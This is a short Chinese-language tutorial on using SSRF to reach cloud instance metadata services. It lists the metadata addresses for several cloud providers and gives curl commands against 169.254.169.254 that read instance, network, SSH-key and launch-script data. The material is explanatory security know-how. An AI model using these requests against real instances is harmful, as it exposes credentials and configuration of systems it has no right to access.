云安全——SSRF漏洞

元数据服务定义

元数据服务是云平台为运行中的实例提供的内部服务，通过特定的内网地址暴露实例自身的配置信息和管理数据。这些数据包括实例身份信息、网络配置、安全凭证等关键信息。
各云厂商元数据服务地址
​​AWS​​: 169.254.169.254
​​阿里云​​: 100.100.100.200
​​腾讯云​​: 169.254.169.254
​​京东云​​: 169.254.169.254
​​华为云​​: 169.254.169.254

SSRF漏洞与元数据服务的结合利用

SSRF漏洞原理

服务器端请求伪造(SSRF)允许攻击者诱使服务器向内部或外部系统发起非预期请求。当结合云元数据服务时，SSRF可转变为获取敏感信息的有效通道。
本次以jdcloud为例，京东云实例元数据文档

基础实例信息

curl http://169.254.169.254/latest/meta-data/instance-id
curl http://169.254.169.254/latest/meta-data/instance-type
curl http://169.254.169.254/latest/meta-data/placement/availability-zone

网络配置信息

curl http://169.254.169.254/latest/meta-data/network/interfaces/macs/
curl http://169.254.169.254/latest/meta-data/network/interfaces/macs/[mac]/vpc-id
curl http://169.254.169.254/latest/meta-data/network/interfaces/macs/[mac]/security-groups

用户数据与凭据

curl http://169.254.169.254/latest/meta-data/attributes/ssh-keys
curl http://169.254.169.254/latest/meta-data/attributes/customdata/userdata/launch-script

自定义元数据

curl http://169.254.169.254/latest/meta-data/attributes/customdata/custom-metadata/[key]